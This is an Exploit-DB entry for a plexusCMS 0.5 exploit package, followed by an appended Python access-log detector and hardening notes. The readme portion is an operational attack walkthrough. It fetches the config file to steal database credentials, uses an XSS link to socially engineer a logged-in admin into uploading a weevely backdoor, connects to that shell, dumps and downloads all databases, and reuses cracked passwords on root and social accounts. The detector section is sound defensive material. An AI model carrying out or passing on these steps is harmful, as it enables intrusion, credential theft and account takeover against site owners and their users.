plexusCMS 0.5 - Cross-Site Scripting / Remote Shell / Credentials Leak

EDB-ID: 32618
CVE: (none listed)
Platform: PHP
Date: 2014-03-31


# Exploit Title: plexusCMS 0.5 XSS Remote Shell Exploit
# Google Dork: allinurl: plx-storage
# Date: 22.02.2013
# Exploit Author: neglomaniac
# Vendor Homepage: http://plexus-cms.org/
# Version: 0.5

---

FILES

backdoor.php	simple command-execution backdoor
commands.txt	list of useful commands for owning the remote box
generator.py	creates the required files from the given parameters
phpinfo.php	simple phpinfo call for testing
plexus05.tgz	original plexus source code for auditing
postit.py	sends the crafted POST request for the file upload
readme.txt	nothing other than this file
request.txt	POST request template used by postit.py
weevely.php	weevely shell with password: secret
weevely.tgz	weevely stealth web backdoor client and generator

---

EXPLOITATION

Get the database credentials with: wget http://RHOST/plx-file/config.php

Try to log in with phpMyAdmin and dump the database for password
cracking. If you can crack the password, you can upload PHP files
as a new image or a new file. Your PHP backdoors can then be launched
from http://plexushost/plx-storage/files/ or plx-storage/images/

If you cannot get access to the database some other way, you can
upload files via XSS and social engineering.

Set up a server with PHP support and Python installed. Copy
all these files to a location you can write to. Launch

python generator.py plexushost 80 http://yourserver/scripts/ weevely.php

If you see "plximage.php, plximage.js, plximage.xss generated!!!",
all files needed for exploitation have been generated.

plexushost is the victim webserver where plexus is installed
port (80 above) is the webserver port

http://yourserver/scripts/ is the location of the exploit files. Do not forget
the trailing slash!!!

weevely.php is the file that gets uploaded to http://victimhost/plx-storage/files/

Get the URL from plximage.xss; obfuscate it, wrap it in an iframe and/or shorten it.
Put it into an email, on a webpage or wherever you want.

Social-engineer your victim into opening this URL. If the victim is logged in,
your backdoor lands at http://victimhost/plx-storage/files/. Otherwise you
need to social-engineer the victim into logging in; after the victim logs in,
the backdoor appears in the files directory.

Connect to your backdoor with weevely and your password (secret):
python weevely.py http://victimhost/plx-storage/files/yourfile.php secret

Dump the whole database with the previously collected credentials and download it:
mysqldump -f -r plxinfo.txt -uYOURUSER -pYOURPASS --all-databases
wget http://RHOST/plx-storage/files/plxinfo.txt

Crack the password and use it for your next attempts against the victim.
For example, try this password for root or other users, other MySQL databases,
the MySQL root account, Facebook/Twitter accounts and so on.
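Every step of the chain above leaves a trace in the web server's access log: a direct fetch of plx-file/config.php, a PHP script being requested from the plx-storage upload directories, and a dump file being downloaded from the same place. The detector below is an added example written for the defending side; it is not part of the exploit package and not plexusCMS code. It assumes the Apache/nginx "combined" log format, the log lines it runs on are constructed for the example (RFC 5737 documentation addresses), and the rule names are ours.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import unquote, urlsplit

# Apache/nginx "combined" access-log format (assumption: the server writes
# this format; the group names below are ours, not plexusCMS's).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


@dataclass
class Finding:
    ip: str
    ts: str
    rule: str
    target: str
    status: str


def classify(method: str, target: str, status: str) -> Optional[str]:
    """Return a rule name when the request matches one of the access
    patterns described in the advisory, or None for ordinary traffic."""
    path = unquote(urlsplit(target).path).lower()

    # 1. Direct request for the file holding the database credentials.
    #    Nothing in normal use fetches it by URL, so flag every status;
    #    whether the source actually leaked depends on how PHP is wired up.
    if path.endswith("/plx-file/config.php"):
        return "config-credential-leak"

    # 2. A PHP script requested from an upload directory: uploaded files
    #    should never be executed, so any such hit is a backdoor candidate.
    if re.search(r"/plx-storage/(files|images)/[^/]+\.php$", path):
        return "php-in-upload-dir"

    # 3. Lower confidence: a text/SQL file pulled from the upload directory,
    #    the pattern a database dump dropped there would produce.
    if method == "GET" and re.search(r"/plx-storage/files/[^/]+\.(txt|sql)$", path):
        return "dump-download"

    return None


def scan(lines: List[str]) -> List[Finding]:
    """Parse combined-format log lines and collect the matching requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production pipeline would count these
        rule = classify(m["method"], m["target"], m["status"])
        if rule:
            findings.append(Finding(m["ip"], m["ts"], rule, m["target"], m["status"]))
    return findings


# Constructed sample log: two benign requests from one client, three
# requests from another that follow the advisory's chain step by step.
SAMPLE_LOG = [
    '203.0.113.7 - - [31/Mar/2014:10:01:02 +0000] "GET /plx-file/config.php HTTP/1.1" 200 412 "-" "Wget/1.14"',
    '198.51.100.4 - - [31/Mar/2014:10:02:11 +0000] "GET /index.php HTTP/1.1" 200 5321 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [31/Mar/2014:10:02:30 +0000] "GET /plx-storage/images/logo.png HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [31/Mar/2014:10:15:44 +0000] "GET /plx-storage/files/upload.php HTTP/1.1" 200 77 "-" "python-requests/2.2"',
    '203.0.113.7 - - [31/Mar/2014:10:20:00 +0000] "GET /plx-storage/files/plxinfo.txt HTTP/1.1" 200 90210 "-" "Wget/1.14"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts}  {f.ip:<15} {f.rule:<24} {f.status} {f.target}")
```

The same three paths are the ones a hardening pass should address: the web server should refuse to serve plx-file/config.php directly and should not execute PHP (or serve anything but static content) out of plx-storage/files/ and plx-storage/images/. Rule 1 is an investigation trigger rather than proof of leakage, since a correctly configured PHP handler returns the script's output, not its source.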

---


Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32618.tgz